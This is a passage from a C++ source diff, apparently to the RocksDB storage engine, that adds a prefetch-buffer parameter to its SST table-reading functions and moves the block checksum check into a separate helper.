std::unique_ptr meta; std::unique_ptr meta_iter; - s = ReadMetaBlock(rep, &meta, &meta_iter); + s = ReadMetaBlock(rep, prefetch_buffer.get(), &meta, &meta_iter); if (!s.ok()) { return s; } @@ -623,8 +648,9 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, s = meta_iter->status(); TableProperties* table_properties = nullptr; if (s.ok()) { - s = ReadProperties(meta_iter->value(), rep->file.get(), rep->footer, - rep->ioptions, &table_properties); + s = ReadProperties(meta_iter->value(), rep->file.get(), + prefetch_buffer.get(), rep->footer, rep->ioptions, + &table_properties); } if (!s.ok()) { @@ -655,9 +681,9 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // TODO(andrewkr): ReadMetaBlock repeats SeekToCompressionDictBlock(). // maybe decode a handle from meta_iter // and do ReadBlockContents(handle) instead - s = rocksdb::ReadMetaBlock(rep->file.get(), file_size, - kBlockBasedTableMagicNumber, rep->ioptions, - rocksdb::kCompressionDictBlock, + s = rocksdb::ReadMetaBlock(rep->file.get(), prefetch_buffer.get(), + file_size, kBlockBasedTableMagicNumber, + rep->ioptions, rocksdb::kCompressionDictBlock, compression_dict_block.get()); if (!s.ok()) { ROCKS_LOG_WARN( @@ -682,6 +708,7 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, } else { if (found_range_del_block && !rep->range_del_handle.IsNull()) { ReadOptions read_options; + // TODO: try to use prefetched buffer too. s = MaybeLoadDataBlockToCache(rep, read_options, rep->range_del_handle, Slice() /* compression_dict */, &rep->range_del_entry); @@ -753,7 +780,8 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // pre-load these blocks, which will kept in member variables in Rep // and with a same life-time as this table object. 
IndexReader* index_reader = nullptr; - s = new_table->CreateIndexReader(&index_reader, meta_iter.get(), level); + s = new_table->CreateIndexReader(prefetch_buffer.get(), &index_reader, + meta_iter.get(), level); if (s.ok()) { rep->index_reader.reset(index_reader); @@ -761,8 +789,8 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // Set filter block if (rep->filter_policy) { const bool is_a_filter_partition = true; - rep->filter.reset( - new_table->ReadFilter(rep->filter_handle, !is_a_filter_partition)); + rep->filter.reset(new_table->ReadFilter( + prefetch_buffer.get(), rep->filter_handle, !is_a_filter_partition)); if (rep->filter.get()) { rep->filter->SetLevel(level); } @@ -816,13 +844,14 @@ size_t BlockBasedTable::ApproximateMemoryUsage() const { // Load the meta-block from the file. On success, return the loaded meta block // and its iterator. Status BlockBasedTable::ReadMetaBlock(Rep* rep, + FilePrefetchBuffer* prefetch_buffer, std::unique_ptr* meta_block, std::unique_ptr* iter) { // TODO(sanjay): Skip this if footer.metaindex_handle() size indicates // it is an empty block. std::unique_ptr meta; Status s = ReadBlockFromFile( - rep->file.get(), rep->footer, ReadOptions(), + rep->file.get(), prefetch_buffer, rep->footer, ReadOptions(), rep->footer.metaindex_handle(), &meta, rep->ioptions, true /* decompress */, Slice() /*compression dict*/, rep->persistent_cache_options, kDisableGlobalSequenceNumber, @@ -1021,7 +1050,8 @@ Status BlockBasedTable::PutDataBlockToCache( } FilterBlockReader* BlockBasedTable::ReadFilter( - const BlockHandle& filter_handle, const bool is_a_filter_partition) const { + FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_handle, + const bool is_a_filter_partition) const { auto& rep = rep_; // TODO: We might want to unify with ReadBlockFromFile() if we start // requiring checksum verification in Table::Open. @@ -1029,8 +1059,8 @@ FilterBlockReader* BlockBasedTable::ReadFilter( return nullptr; } BlockContents block; - if (!ReadBlockContents(rep->file.get(), rep->footer, ReadOptions(), - filter_handle, &block, rep->ioptions, + if (!ReadBlockContents(rep->file.get(), prefetch_buffer, rep->footer, + ReadOptions(), filter_handle, &block, rep->ioptions, false /* decompress */, Slice() /*compression dict*/, rep->persistent_cache_options) .ok()) { @@ -1127,7 +1157,8 @@ BlockBasedTable::CachableEntry BlockBasedTable::GetFilter( // Do not invoke any io. return CachableEntry(); } else { - filter = ReadFilter(filter_blk_handle, is_a_filter_partition); + filter = ReadFilter(nullptr /* prefetch_buffer */, filter_blk_handle, + is_a_filter_partition); if (filter != nullptr) { assert(filter->size() > 0); Status s = block_cache->Insert( @@ -1195,7 +1226,7 @@ InternalIterator* BlockBasedTable::NewIndexIterator( // Create index reader and put it in the cache. 
Status s; TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread2:2"); - s = CreateIndexReader(&index_reader); + s = CreateIndexReader(nullptr /* prefetch_buffer */, &index_reader); TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread1:1"); TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread2:3"); TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread1:4"); @@ -1290,10 +1321,11 @@ InternalIterator* BlockBasedTable::NewDataBlockIterator( } } std::unique_ptr block_value; - s = ReadBlockFromFile( - rep->file.get(), rep->footer, ro, handle, &block_value, rep->ioptions, - true /* compress */, compression_dict, rep->persistent_cache_options, - rep->global_seqno, rep->table_options.read_amp_bytes_per_bit); + s = ReadBlockFromFile(rep->file.get(), nullptr /* prefetch_buffer */, + rep->footer, ro, handle, &block_value, rep->ioptions, + true /* compress */, compression_dict, + rep->persistent_cache_options, rep->global_seqno, + rep->table_options.read_amp_bytes_per_bit); if (s.ok()) { block.value = block_value.release(); } @@ -1360,11 +1392,12 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache( std::unique_ptr raw_block; { StopWatch sw(rep->ioptions.env, statistics, READ_BLOCK_GET_MICROS); - s = ReadBlockFromFile( - rep->file.get(), rep->footer, ro, handle, &raw_block, rep->ioptions, - block_cache_compressed == nullptr, compression_dict, - rep->persistent_cache_options, rep->global_seqno, - rep->table_options.read_amp_bytes_per_bit); + s = ReadBlockFromFile(rep->file.get(), nullptr /* prefetch_buffer*/, + rep->footer, ro, handle, &raw_block, + rep->ioptions, block_cache_compressed == nullptr, + compression_dict, rep->persistent_cache_options, + rep->global_seqno, + rep->table_options.read_amp_bytes_per_bit); } if (s.ok()) { @@ -1750,7 +1783,7 @@ Status BlockBasedTable::VerifyChecksum() { // Check Meta blocks std::unique_ptr meta; std::unique_ptr meta_iter; - s = ReadMetaBlock(rep_, &meta, &meta_iter); + s = ReadMetaBlock(rep_, nullptr /* prefetch buffer */, &meta, &meta_iter); if (s.ok()) { s = VerifyChecksumInBlocks(meta_iter.get()); if (!s.ok()) { @@ -1788,9 +1821,10 @@ Status BlockBasedTable::VerifyChecksumInBlocks(InternalIterator* index_iter) { break; } BlockContents contents; - s = ReadBlockContents(rep_->file.get(), rep_->footer, ReadOptions(), - handle, &contents, rep_->ioptions, - false /* decompress */, Slice() /*compression dict*/, + s = ReadBlockContents(rep_->file.get(), nullptr /* prefetch buffer */, + rep_->footer, ReadOptions(), handle, &contents, + rep_->ioptions, false /* decompress */, + Slice() /*compression dict*/, rep_->persistent_cache_options); if (!s.ok()) { break; @@ -1840,8 +1874,8 @@ bool BlockBasedTable::TEST_KeyInCache(const ReadOptions& options, // 4. internal_comparator // 5. index_type Status BlockBasedTable::CreateIndexReader( - IndexReader** index_reader, InternalIterator* preloaded_meta_index_iter, - int level) { + FilePrefetchBuffer* prefetch_buffer, IndexReader** index_reader, + InternalIterator* preloaded_meta_index_iter, int level) { // Some old version of block-based tables don't have index type present in // table properties. If that's the case we can safely use the kBinarySearch. 
auto index_type_on_file = BlockBasedTableOptions::kBinarySearch; @@ -1869,20 +1903,22 @@ Status BlockBasedTable::CreateIndexReader( switch (index_type_on_file) { case BlockBasedTableOptions::kTwoLevelIndexSearch: { return PartitionIndexReader::Create( - this, file, footer, footer.index_handle(), rep_->ioptions, - icomparator, index_reader, rep_->persistent_cache_options, level); + this, file, prefetch_buffer, footer, footer.index_handle(), + rep_->ioptions, icomparator, index_reader, + rep_->persistent_cache_options, level); } case BlockBasedTableOptions::kBinarySearch: { return BinarySearchIndexReader::Create( - file, footer, footer.index_handle(), rep_->ioptions, icomparator, - index_reader, rep_->persistent_cache_options); + file, prefetch_buffer, footer, footer.index_handle(), rep_->ioptions, + icomparator, index_reader, rep_->persistent_cache_options); } case BlockBasedTableOptions::kHashSearch: { std::unique_ptr meta_guard; std::unique_ptr meta_iter_guard; auto meta_index_iter = preloaded_meta_index_iter; if (meta_index_iter == nullptr) { - auto s = ReadMetaBlock(rep_, &meta_guard, &meta_iter_guard); + auto s = + ReadMetaBlock(rep_, prefetch_buffer, &meta_guard, &meta_iter_guard); if (!s.ok()) { // we simply fall back to binary search in case there is any // problem with prefix hash index loading. @@ -1890,16 +1926,18 @@ Status BlockBasedTable::CreateIndexReader( "Unable to read the metaindex block." " Fall back to binary search index."); return BinarySearchIndexReader::Create( - file, footer, footer.index_handle(), rep_->ioptions, icomparator, - index_reader, rep_->persistent_cache_options); + file, prefetch_buffer, footer, footer.index_handle(), + rep_->ioptions, icomparator, index_reader, + rep_->persistent_cache_options); } meta_index_iter = meta_iter_guard.get(); } return HashIndexReader::Create( - rep_->internal_prefix_transform.get(), footer, file, rep_->ioptions, - icomparator, footer.index_handle(), meta_index_iter, index_reader, - rep_->hash_index_allow_collision, rep_->persistent_cache_options); + rep_->internal_prefix_transform.get(), footer, file, prefetch_buffer, + rep_->ioptions, icomparator, footer.index_handle(), meta_index_iter, + index_reader, rep_->hash_index_allow_collision, + rep_->persistent_cache_options); } default: { std::string error_message = @@ -2015,7 +2053,8 @@ Status BlockBasedTable::DumpTable(WritableFile* out_file) { "--------------------------------------\n"); std::unique_ptr meta; std::unique_ptr meta_iter; - Status s = ReadMetaBlock(rep_, &meta, &meta_iter); + Status s = + ReadMetaBlock(rep_, nullptr /* prefetch_buffer */, &meta, &meta_iter); if (s.ok()) { for (meta_iter->SeekToFirst(); meta_iter->Valid(); meta_iter->Next()) { s = meta_iter->status(); @@ -2071,10 +2110,11 @@ Status BlockBasedTable::DumpTable(WritableFile* out_file) { BlockHandle handle; if (FindMetaBlock(meta_iter.get(), filter_block_key, &handle).ok()) { BlockContents block; - if (ReadBlockContents( - rep_->file.get(), rep_->footer, ReadOptions(), handle, &block, - rep_->ioptions, false /*decompress*/, - Slice() /*compression dict*/, rep_->persistent_cache_options) + if (ReadBlockContents(rep_->file.get(), nullptr /* prefetch_buffer */, + rep_->footer, ReadOptions(), handle, &block, + rep_->ioptions, false /*decompress*/, + Slice() /*compression dict*/, + rep_->persistent_cache_options) .ok()) { rep_->filter.reset(new BlockBasedFilterBlockReader( rep_->ioptions.prefix_extractor, table_options, diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 
3451614c878..457edce2205 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -300,7 +300,7 @@ class BlockBasedTable : public TableReader { // need to access extra meta blocks for index construction. This parameter // helps avoid re-reading meta index block if caller already created one. Status CreateIndexReader( - IndexReader** index_reader, + FilePrefetchBuffer* prefetch_buffer, IndexReader** index_reader, InternalIterator* preloaded_meta_index_iter = nullptr, const int level = -1); @@ -309,13 +309,15 @@ class BlockBasedTable : public TableReader { const bool no_io) const; // Read the meta block from sst. - static Status ReadMetaBlock(Rep* rep, std::unique_ptr* meta_block, + static Status ReadMetaBlock(Rep* rep, FilePrefetchBuffer* prefetch_buffer, + std::unique_ptr* meta_block, std::unique_ptr* iter); Status VerifyChecksumInBlocks(InternalIterator* index_iter); // Create the filter from the filter block. - FilterBlockReader* ReadFilter(const BlockHandle& filter_handle, + FilterBlockReader* ReadFilter(FilePrefetchBuffer* prefetch_buffer, + const BlockHandle& filter_handle, const bool is_a_filter_partition) const; static void SetupCacheKeyPrefix(Rep* rep, uint64_t file_size); diff --git a/table/format.cc b/table/format.cc index 3e5a191bbf2..e5f2df0074a 100644 --- a/table/format.cc +++ b/table/format.cc @@ -216,8 +216,10 @@ std::string Footer::ToString() const { return result; } -Status ReadFooterFromFile(RandomAccessFileReader* file, uint64_t file_size, - Footer* footer, uint64_t enforce_table_magic_number) { +Status ReadFooterFromFile(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, + uint64_t file_size, Footer* footer, + uint64_t enforce_table_magic_number) { if (file_size < Footer::kMinEncodedLength) { return Status::Corruption( "file is too short (" + ToString(file_size) + " bytes) to be an " @@ -230,9 +232,14 @@ Status ReadFooterFromFile(RandomAccessFileReader* file, uint64_t file_size, (file_size > Footer::kMaxEncodedLength) ? static_cast(file_size - Footer::kMaxEncodedLength) : 0; - Status s = file->Read(read_offset, Footer::kMaxEncodedLength, &footer_input, - footer_space); - if (!s.ok()) return s; + Status s; + if (prefetch_buffer == nullptr || + !prefetch_buffer->TryReadFromCache(read_offset, Footer::kMaxEncodedLength, + &footer_input)) { + s = file->Read(read_offset, Footer::kMaxEncodedLength, &footer_input, + footer_space); + if (!s.ok()) return s; + } // Check that we actually read the whole footer from the file. It may be // that size isn't correct. 
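The hunk above converts the footer read into a read-through lookup: consult the optional prefetch buffer first, and only touch the file on a miss. A minimal standalone sketch of that pattern (the helper name ReadWithPrefetch is hypothetical, not part of the patch):

#include "util/file_reader_writer.h"  // RandomAccessFileReader, FilePrefetchBuffer

namespace rocksdb {

// Illustrative helper: read [offset, offset + n) through the optional
// tail-prefetch buffer, falling back to a real file read on a miss.
Status ReadWithPrefetch(RandomAccessFileReader* file,
                        FilePrefetchBuffer* prefetch_buffer,  // may be nullptr
                        uint64_t offset, size_t n, Slice* result,
                        char* scratch) {
  if (prefetch_buffer != nullptr &&
      prefetch_buffer->TryReadFromCache(offset, n, result)) {
    // Served from the prefetched tail; no file I/O is issued.
    return Status::OK();
  }
  // Miss: issue a normal read into the caller-provided scratch buffer.
  return file->Read(offset, n, result, scratch);
}

}  // namespace rocksdb

As the TryReadFromCache() implementation later in this patch shows, the lookup succeeds only when the whole requested range lies inside the buffered range, so a partial overlap also falls through to a normal read.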
@@ -259,6 +266,43 @@ Status ReadFooterFromFile(RandomAccessFileReader* file, uint64_t file_size, // Without anonymous namespace here, we fail the warning -Wmissing-prototypes namespace { +Status CheckBlockChecksum(const ReadOptions& options, const Footer& footer, + const Slice& contents, size_t block_size, + RandomAccessFileReader* file, + const BlockHandle& handle) { + Status s; + // Check the crc of the type and the block contents + if (options.verify_checksums) { + const char* data = contents.data(); // Pointer to where Read put the data + PERF_TIMER_GUARD(block_checksum_time); + uint32_t value = DecodeFixed32(data + block_size + 1); + uint32_t actual = 0; + switch (footer.checksum()) { + case kCRC32c: + value = crc32c::Unmask(value); + actual = crc32c::Value(data, block_size + 1); + break; + case kxxHash: + actual = XXH32(data, static_cast(block_size) + 1, 0); + break; + default: + s = Status::Corruption( + "unknown checksum type " + ToString(footer.checksum()) + " in " + + file->file_name() + " offset " + ToString(handle.offset()) + + " size " + ToString(block_size)); + } + if (s.ok() && actual != value) { + s = Status::Corruption( + "block checksum mismatch: expected " + ToString(actual) + ", got " + + ToString(value) + " in " + file->file_name() + " offset " + + ToString(handle.offset()) + " size " + ToString(block_size)); + } + if (!s.ok()) { + return s; + } + } + return s; +} // Read a block and check its CRC // contents is the result of reading. @@ -281,53 +325,21 @@ Status ReadBlock(RandomAccessFileReader* file, const Footer& footer, return s; } if (contents->size() != n + kBlockTrailerSize) { - return Status::Corruption( - "truncated block read from " + file->file_name() + " offset " - + ToString(handle.offset()) + ", expected " - + ToString(n + kBlockTrailerSize) + " bytes, got " - + ToString(contents->size())); - } - - // Check the crc of the type and the block contents - const char* data = contents->data(); // Pointer to where Read put the data - if (options.verify_checksums) { - PERF_TIMER_GUARD(block_checksum_time); - uint32_t value = DecodeFixed32(data + n + 1); - uint32_t actual = 0; - switch (footer.checksum()) { - case kCRC32c: - value = crc32c::Unmask(value); - actual = crc32c::Value(data, n + 1); - break; - case kxxHash: - actual = XXH32(data, static_cast(n) + 1, 0); - break; - default: - s = Status::Corruption( - "unknown checksum type " + ToString(footer.checksum()) - + " in " + file->file_name() + " offset " - + ToString(handle.offset()) + " size " + ToString(n)); - } - if (s.ok() && actual != value) { - s = Status::Corruption( - "block checksum mismatch: expected " + ToString(actual) - + ", got " + ToString(value) + " in " + file->file_name() - + " offset " + ToString(handle.offset()) - + " size " + ToString(n)); - } - if (!s.ok()) { - return s; - } + return Status::Corruption("truncated block read from " + file->file_name() + + " offset " + ToString(handle.offset()) + + ", expected " + ToString(n + kBlockTrailerSize) + + " bytes, got " + ToString(contents->size())); } - return s; + return CheckBlockChecksum(options, footer, *contents, n, file, handle); } } // namespace -Status ReadBlockContents(RandomAccessFileReader* file, const Footer& footer, - const ReadOptions& read_options, +Status ReadBlockContents(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, + const Footer& footer, const ReadOptions& read_options, const BlockHandle& handle, BlockContents* contents, - const ImmutableCFOptions &ioptions, + const ImmutableCFOptions& ioptions, bool 
decompression_requested, const Slice& compression_dict, const PersistentCacheOptions& cache_options) { @@ -357,8 +369,21 @@ Status ReadBlockContents(RandomAccessFileReader* file, const Footer& footer, } } - if (cache_options.persistent_cache && - cache_options.persistent_cache->IsCompressed()) { + bool got_from_prefetch_buffer = false; + if (prefetch_buffer != nullptr && + prefetch_buffer->TryReadFromCache( + handle.offset(), + static_cast(handle.size()) + kBlockTrailerSize, &slice)) { + status = + CheckBlockChecksum(read_options, footer, slice, + static_cast(handle.size()), file, handle); + if (!status.ok()) { + return status; + } + got_from_prefetch_buffer = true; + used_buf = const_cast(slice.data()); + } else if (cache_options.persistent_cache && + cache_options.persistent_cache->IsCompressed()) { // lookup uncompressed cache mode p-cache status = PersistentCacheHelper::LookupRawPage( cache_options, handle, &heap_buf, n + kBlockTrailerSize); @@ -366,40 +391,42 @@ Status ReadBlockContents(RandomAccessFileReader* file, const Footer& footer, status = Status::NotFound(); } - if (status.ok()) { - // cache hit - used_buf = heap_buf.get(); - slice = Slice(heap_buf.get(), n); - } else { - if (ioptions.info_log && !status.IsNotFound()) { - assert(!status.ok()); - ROCKS_LOG_INFO(ioptions.info_log, - "Error reading from persistent cache. %s", - status.ToString().c_str()); - } - // cache miss read from device - if (decompression_requested && - n + kBlockTrailerSize < DefaultStackBufferSize) { - // If we've got a small enough hunk of data, read it in to the - // trivially allocated stack buffer instead of needing a full malloc() - used_buf = &stack_buf[0]; - } else { - heap_buf = std::unique_ptr(new char[n + kBlockTrailerSize]); + if (!got_from_prefetch_buffer) { + if (status.ok()) { + // cache hit used_buf = heap_buf.get(); - } + slice = Slice(heap_buf.get(), n); + } else { + if (ioptions.info_log && !status.IsNotFound()) { + assert(!status.ok()); + ROCKS_LOG_INFO(ioptions.info_log, + "Error reading from persistent cache. 
%s", + status.ToString().c_str()); + } + // cache miss read from device + if (decompression_requested && + n + kBlockTrailerSize < DefaultStackBufferSize) { + // If we've got a small enough hunk of data, read it in to the + // trivially allocated stack buffer instead of needing a full malloc() + used_buf = &stack_buf[0]; + } else { + heap_buf = std::unique_ptr(new char[n + kBlockTrailerSize]); + used_buf = heap_buf.get(); + } - status = ReadBlock(file, footer, read_options, handle, &slice, used_buf); - if (status.ok() && read_options.fill_cache && - cache_options.persistent_cache && - cache_options.persistent_cache->IsCompressed()) { - // insert to raw cache - PersistentCacheHelper::InsertRawPage(cache_options, handle, used_buf, - n + kBlockTrailerSize); + status = ReadBlock(file, footer, read_options, handle, &slice, used_buf); + if (status.ok() && read_options.fill_cache && + cache_options.persistent_cache && + cache_options.persistent_cache->IsCompressed()) { + // insert to raw cache + PersistentCacheHelper::InsertRawPage(cache_options, handle, used_buf, + n + kBlockTrailerSize); + } } - } - if (!status.ok()) { - return status; + if (!status.ok()) { + return status; + } } PERF_TIMER_GUARD(block_decompress_time); @@ -416,14 +443,14 @@ Status ReadBlockContents(RandomAccessFileReader* file, const Footer& footer, *contents = BlockContents(Slice(slice.data(), n), false, compression_type); } else { // page is uncompressed, the buffer either stack or heap provided - if (used_buf == &stack_buf[0]) { + if (got_from_prefetch_buffer || used_buf == &stack_buf[0]) { heap_buf = std::unique_ptr(new char[n]); - memcpy(heap_buf.get(), stack_buf, n); + memcpy(heap_buf.get(), used_buf, n); } *contents = BlockContents(std::move(heap_buf), n, true, compression_type); } - if (status.ok() && read_options.fill_cache && + if (status.ok() && !got_from_prefetch_buffer && read_options.fill_cache && cache_options.persistent_cache && !cache_options.persistent_cache->IsCompressed()) { // insert to uncompressed cache diff --git a/table/format.h b/table/format.h index d89b1d312cf..512b4a32bfa 100644 --- a/table/format.h +++ b/table/format.h @@ -18,6 +18,7 @@ #include "options/cf_options.h" #include "port/port.h" // noexcept #include "table/persistent_cache_options.h" +#include "util/file_reader_writer.h" namespace rocksdb { @@ -173,8 +174,9 @@ class Footer { // Read the footer from file // If enforce_table_magic_number != 0, ReadFooterFromFile() will return // corruption if table_magic number is not equal to enforce_table_magic_number -Status ReadFooterFromFile(RandomAccessFileReader* file, uint64_t file_size, - Footer* footer, +Status ReadFooterFromFile(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, + uint64_t file_size, Footer* footer, uint64_t enforce_table_magic_number = 0); // 1-byte type + 32-bit crc @@ -213,9 +215,9 @@ struct BlockContents { // Read the block identified by "handle" from "file". On failure // return non-OK. On success fill *result and return OK. 
extern Status ReadBlockContents( - RandomAccessFileReader* file, const Footer& footer, - const ReadOptions& options, const BlockHandle& handle, - BlockContents* contents, const ImmutableCFOptions &ioptions, + RandomAccessFileReader* file, FilePrefetchBuffer* prefetch_buffer, + const Footer& footer, const ReadOptions& options, const BlockHandle& handle, + BlockContents* contents, const ImmutableCFOptions& ioptions, bool do_uncompress = true, const Slice& compression_dict = Slice(), const PersistentCacheOptions& cache_options = PersistentCacheOptions()); diff --git a/table/meta_blocks.cc b/table/meta_blocks.cc index 5946e40fe0b..1227bb0aeb7 100644 --- a/table/meta_blocks.cc +++ b/table/meta_blocks.cc @@ -16,6 +16,7 @@ #include "table/persistent_cache_helper.h" #include "table/table_properties_internal.h" #include "util/coding.h" +#include "util/file_reader_writer.h" namespace rocksdb { @@ -159,7 +160,8 @@ bool NotifyCollectTableCollectorsOnFinish( } Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file, - const Footer& footer, const ImmutableCFOptions& ioptions, + FilePrefetchBuffer* prefetch_buffer, const Footer& footer, + const ImmutableCFOptions& ioptions, TableProperties** table_properties) { assert(table_properties); @@ -173,8 +175,8 @@ Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file, ReadOptions read_options; read_options.verify_checksums = false; Status s; - s = ReadBlockContents(file, footer, read_options, handle, &block_contents, - ioptions, false /* decompress */); + s = ReadBlockContents(file, prefetch_buffer, footer, read_options, handle, + &block_contents, ioptions, false /* decompress */); if (!s.ok()) { return s; @@ -277,7 +279,8 @@ Status ReadTableProperties(RandomAccessFileReader* file, uint64_t file_size, TableProperties** properties) { // -- Read metaindex block Footer footer; - auto s = ReadFooterFromFile(file, file_size, &footer, table_magic_number); + auto s = ReadFooterFromFile(file, nullptr /* prefetch_buffer */, file_size, + &footer, table_magic_number); if (!s.ok()) { return s; } @@ -286,8 +289,9 @@ Status ReadTableProperties(RandomAccessFileReader* file, uint64_t file_size, BlockContents metaindex_contents; ReadOptions read_options; read_options.verify_checksums = false; - s = ReadBlockContents(file, footer, read_options, metaindex_handle, - &metaindex_contents, ioptions, false /* decompress */); + s = ReadBlockContents(file, nullptr /* prefetch_buffer */, footer, + read_options, metaindex_handle, &metaindex_contents, + ioptions, false /* decompress */); if (!s.ok()) { return s; } @@ -305,7 +309,8 @@ Status ReadTableProperties(RandomAccessFileReader* file, uint64_t file_size, TableProperties table_properties; if (found_properties_block == true) { - s = ReadProperties(meta_iter->value(), file, footer, ioptions, properties); + s = ReadProperties(meta_iter->value(), file, nullptr /* prefetch_buffer */, + footer, ioptions, properties); } else { s = Status::NotFound(); } @@ -332,7 +337,8 @@ Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size, const std::string& meta_block_name, BlockHandle* block_handle) { Footer footer; - auto s = ReadFooterFromFile(file, file_size, &footer, table_magic_number); + auto s = ReadFooterFromFile(file, nullptr /* prefetch_buffer */, file_size, + &footer, table_magic_number); if (!s.ok()) { return s; } @@ -341,8 +347,9 @@ Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size, BlockContents metaindex_contents; ReadOptions read_options; 
read_options.verify_checksums = false; - s = ReadBlockContents(file, footer, read_options, metaindex_handle, - &metaindex_contents, ioptions, false /* do decompression */); + s = ReadBlockContents(file, nullptr /* prefetch_buffer */, footer, + read_options, metaindex_handle, &metaindex_contents, + ioptions, false /* do decompression */); if (!s.ok()) { return s; } @@ -355,14 +362,16 @@ Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size, return FindMetaBlock(meta_iter.get(), meta_block_name, block_handle); } -Status ReadMetaBlock(RandomAccessFileReader* file, uint64_t file_size, +Status ReadMetaBlock(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, uint64_t file_size, uint64_t table_magic_number, - const ImmutableCFOptions &ioptions, + const ImmutableCFOptions& ioptions, const std::string& meta_block_name, BlockContents* contents) { Status status; Footer footer; - status = ReadFooterFromFile(file, file_size, &footer, table_magic_number); + status = ReadFooterFromFile(file, prefetch_buffer, file_size, &footer, + table_magic_number); if (!status.ok()) { return status; } @@ -372,8 +381,8 @@ Status ReadMetaBlock(RandomAccessFileReader* file, uint64_t file_size, BlockContents metaindex_contents; ReadOptions read_options; read_options.verify_checksums = false; - status = ReadBlockContents(file, footer, read_options, metaindex_handle, - &metaindex_contents, ioptions, + status = ReadBlockContents(file, prefetch_buffer, footer, read_options, + metaindex_handle, &metaindex_contents, ioptions, false /* decompress */); if (!status.ok()) { return status; @@ -394,8 +403,9 @@ Status ReadMetaBlock(RandomAccessFileReader* file, uint64_t file_size, } // Reading metablock - return ReadBlockContents(file, footer, read_options, block_handle, contents, - ioptions, false /* decompress */); + return ReadBlockContents(file, prefetch_buffer, footer, read_options, + block_handle, contents, ioptions, + false /* decompress */); } } // namespace rocksdb diff --git a/table/meta_blocks.h b/table/meta_blocks.h index ddb685360d6..220985d9e10 100644 --- a/table/meta_blocks.h +++ b/table/meta_blocks.h @@ -94,7 +94,8 @@ bool NotifyCollectTableCollectorsOnFinish( // *table_properties will point to a heap-allocated TableProperties // object, otherwise value of `table_properties` will not be modified. Status ReadProperties(const Slice& handle_value, RandomAccessFileReader* file, - const Footer& footer, const ImmutableCFOptions &ioptions, + FilePrefetchBuffer* prefetch_buffer, const Footer& footer, + const ImmutableCFOptions& ioptions, TableProperties** table_properties); // Directly read the properties from the properties block of a plain table. @@ -121,9 +122,10 @@ Status FindMetaBlock(RandomAccessFileReader* file, uint64_t file_size, // Read the specified meta block with name meta_block_name // from `file` and initialize `contents` with contents of this block. // Return Status::OK in case of success. 
-Status ReadMetaBlock(RandomAccessFileReader* file, uint64_t file_size, +Status ReadMetaBlock(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, uint64_t file_size, uint64_t table_magic_number, - const ImmutableCFOptions &ioptions, + const ImmutableCFOptions& ioptions, const std::string& meta_block_name, BlockContents* contents); diff --git a/table/partitioned_filter_block.cc b/table/partitioned_filter_block.cc index 2b330039e50..d3d7949d09f 100644 --- a/table/partitioned_filter_block.cc +++ b/table/partitioned_filter_block.cc @@ -132,7 +132,8 @@ bool PartitionedFilterBlockReader::KeyMayMatch( return false; } bool cached = false; - auto filter_partition = GetFilterPartition(&filter_handle, no_io, &cached); + auto filter_partition = GetFilterPartition(nullptr /* prefetch_buffer */, + &filter_handle, no_io, &cached); if (UNLIKELY(!filter_partition.value)) { return true; } @@ -164,7 +165,8 @@ bool PartitionedFilterBlockReader::PrefixMayMatch( return false; } bool cached = false; - auto filter_partition = GetFilterPartition(&filter_handle, no_io, &cached); + auto filter_partition = GetFilterPartition(nullptr /* prefetch_buffer */, + &filter_handle, no_io, &cached); if (UNLIKELY(!filter_partition.value)) { return true; } @@ -194,9 +196,9 @@ Slice PartitionedFilterBlockReader::GetFilterPartitionHandle( } BlockBasedTable::CachableEntry -PartitionedFilterBlockReader::GetFilterPartition(Slice* handle_value, - const bool no_io, - bool* cached) { +PartitionedFilterBlockReader::GetFilterPartition( + FilePrefetchBuffer* prefetch_buffer, Slice* handle_value, const bool no_io, + bool* cached) { BlockHandle fltr_blk_handle; auto s = fltr_blk_handle.DecodeFrom(handle_value); assert(s.ok()); @@ -232,7 +234,8 @@ PartitionedFilterBlockReader::GetFilterPartition(Slice* handle_value, } return filter; } else { - auto filter = table_->ReadFilter(fltr_blk_handle, is_a_filter_partition); + auto filter = table_->ReadFilter(prefetch_buffer, fltr_blk_handle, + is_a_filter_partition); return {filter, nullptr}; } } diff --git a/table/partitioned_filter_block.h b/table/partitioned_filter_block.h index 6c4a5d7b9d2..d408175390f 100644 --- a/table/partitioned_filter_block.h +++ b/table/partitioned_filter_block.h @@ -86,7 +86,8 @@ class PartitionedFilterBlockReader : public FilterBlockReader { private: Slice GetFilterPartitionHandle(const Slice& entry); BlockBasedTable::CachableEntry GetFilterPartition( - Slice* handle, const bool no_io, bool* cached); + FilePrefetchBuffer* prefetch_buffer, Slice* handle, const bool no_io, + bool* cached); const SliceTransform* prefix_extractor_; std::unique_ptr idx_on_fltr_blk_; diff --git a/table/plain_table_reader.cc b/table/plain_table_reader.cc index 92933b34ba1..d4d9edb7412 100644 --- a/table/plain_table_reader.cc +++ b/table/plain_table_reader.cc @@ -291,9 +291,10 @@ Status PlainTableReader::PopulateIndex(TableProperties* props, table_properties_.reset(props); BlockContents index_block_contents; - Status s = ReadMetaBlock( - file_info_.file.get(), file_size_, kPlainTableMagicNumber, ioptions_, - PlainTableIndexBuilder::kPlainTableIndexBlock, &index_block_contents); + Status s = ReadMetaBlock(file_info_.file.get(), nullptr /* 